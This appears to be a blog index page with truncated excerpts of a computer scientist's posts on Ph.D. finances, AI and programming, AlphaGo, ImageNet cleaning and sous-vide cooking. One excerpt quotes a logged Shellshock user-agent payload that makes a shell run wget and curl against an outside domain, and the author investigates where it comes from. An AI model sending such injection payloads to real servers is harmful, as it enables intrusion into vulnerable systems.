Posts

Finances for CS Ph.D. students

Image
This post is based upon a few recent conversations I've had with my own Ph.D. students.  Its intended audience is Ph.D. students at mid-to-upper-end computer science programs in the United States, who are either US citizens/permanent residents, or plan to remain and retire in the U.S.

Welcome to graduate school in computer science, where not only do we not charge you tuition, but we shower you with so much money that you can afford to eat, have a house over your head, and wear shirts that have fewer than five holes in them!

In fact, you can probably do better than that, and get a nice boost to being financially independent.  But it takes some advance planning.

Why Bother?
Mostly, because flexibility -- or, more crassly, "FU Money."  (You can google that in case the meaning isn't obvious.)  Getting started early on the path to financial independence lets you be in charge of your life.  You may also discover halfway through your program that there's this crazy nonp…

Don't quit that programming career yet because of AI

Image
A recent Wired article breathlessly predicted the end of code:
Soon We Won’t Program Computers. We’ll Train Them Like Dogs Of course, this is the same magazine that declared in 2010 that The Web is Dead.  So perhaps we should step back and think before throwing in the towel.  Have you looked at a self-driving car recently?

In this simplified diagram blatantly stolen from Google, there's a laser scanner, a radar, a compass, speed sensors - missing are the cameras, the engine computer, the onboard computers, the cellular uplinks, the data recorders, the
onboard entertainment system (which will hopefully get even more use when the driver gets to play also).  And the backup systems, which are often redundantly engineered and even separately programmed to avoid coordinated failure.  Each of these devices has substantial embedded firmware controlling them, and per-device processing in order to control them and make sense of the data they generate.

Oh, and that car depends on Google'…

Indirect shellshock security scanning via other people's logfiles

Image
One of my friends noted that he'd spotted a shellshock-style user-agent string in his web log files, looking like:

24.71.248.218 - - [28/Apr/2016:16:55:30 -0500] "GET / HTTP/1.1" 403 4961 "-" "() { :; }; /bin/sh -c 'wget http://closettransfer.com/IPTRANSITTEST -O /dev/null;wget1 http://closettransfer.com/IPTRANSITTEST -O /dev/null;curl http://closettransfer.com/IPTRANSITTEST -o /dev/null;/usr/sfwbin/wget http://closettransfer.com/IPTRANSITTEST;fetch -/dev/null http://closettransfer.com/IPTRANSITTEST'"

Curious about whether it was a legitimate domain (perhaps owned), I googled the domain name:

Seasonally-appropriate designer labels.  Doesn't really seem like the kind of thing a white-hat security scanner would be pretending to be.  Was the domain compromised and I should try to notify them? Hmm.  What the heck - try to download the page:

 --2016-04-30 13:38:26--  http://closettransfer.com/IPTRANSITTEST
Resolving closettransfer.com (closettrans…

Stealing Google's Coding Practices for Academia

Image
I'm spending the year in Google's Visiting Faculty program.  I had a few goals for my experience here:

Learn learn learn!  I hoped to get a different perspective from the inside of the largest collection of computing & distributed systems that the world has ever seen, and to learn enough about machine learning to think better about providing systems support for it.  I haven't been disappointed.Do some real engineering.  I spend most of my time as a faculty member teaching & mentoring my Ph.D. students in research.  I love this - it's terribly fun and working with fantastic students is an incredibly rewarding experience.  But I also get a lot of creative satisfaction from coding, and I can only carve out a bit of my faculty time to dedicate to it.  I haven't written large amounts of production code since I was 21 - and the world has changed a lot since then.  Contribute something useful to Google while I was here.  They're paying my salary for the time I&…

AlphaGo is a triumph for humanity

... and not something to be afraid of.

As anyone who hasn't been hiding under a rock knows, Google Deepmind's AlphaGo program decisively won its third game in a row against grandmaster Lee Sedol.

First of all, I argue that we shouldn't find this surprising:  We're still riding the exponential wave of the growth of computing power in hardware, and when that's coupled in significant software advances such as deep neural networks, we get great things.  Go, despite its massive positional complexity, is still the kind of thing that computers excel at:  It has a precisely defined objective and rules, it admits a fairly compact representation, and exists entirely within the world of bits.

Second, I argue that this is an excellent excuse for all of humanity to pat itself on the back.  Consider what went in to the AlphaGo victory:

The Nature paper version of AlphaGo is noted to have used 1206 CPUs and 176 GPUs.  The details are vague, but for our purposes don't matter. …

Cleaning the Imagenet Dataset, collected notes

Image
As part of my sabbatical at Google, I spent the last month working on processing images from the
Imagenet Large Scale Visual Recognition Challenge (ILSVRC 2012) dataset using Tensorflow.  (Note that I've linked to the '14 dataset because it contains the image blacklist I discuss below, but the it has the same classification images as the '12 dataset).

As is well-known enough that there's an entire subreddit dedicated to it, cleaning data before feeding it into a machine learning system is both time-consuming and somewhat annoying.  Despite being a curated "challenge" dataset, it turns out that ILSVRC'12 needs cleaning as well.  Much of this is known already among people who use the dataset, but with the recent explosion in popularity of machine and deep learning, I figured I'd put my collected notes here to save others the time.

Without further ado, the ILSVRC 2014 Data Gotchas:
Images in the wrong format: (1)  Unlike each of its ~million peers, Image …

Vegan sous-vide recipes #1

Image
Sous vide immersion cookers (I use the Anova) have become cheap and easily available - under $200, clamp on to the side of your pot, life is happy.  The Internet abounds about tales of meat cooked for hours until perfectly tender;  eggs cooked to perfection in a dozen ways.  But what about our dear vegetable friends?

I'm keeping a little journal of my journey through sous vide veggies - hope it's useful!
The Wins Thus Far
The biggest win has been ... starchy roots!

Following Kenji @ The Food Lab's suggestion, I threw three sweet potatoes, three potatoes, and three large beets in individual bags for about 2h at 150F.  After that, I removed them from their bags, and diced them into small dice and roasted them at 350 for about 45 minutes, tossed with a mix of salt, MSG, better than bouillon no-chicken base, and canola oil.  Fantastic!  The two hours at 150F really bring out the natural sweetness of the roots, and the results had great happiness.

A surprising benefit of this a…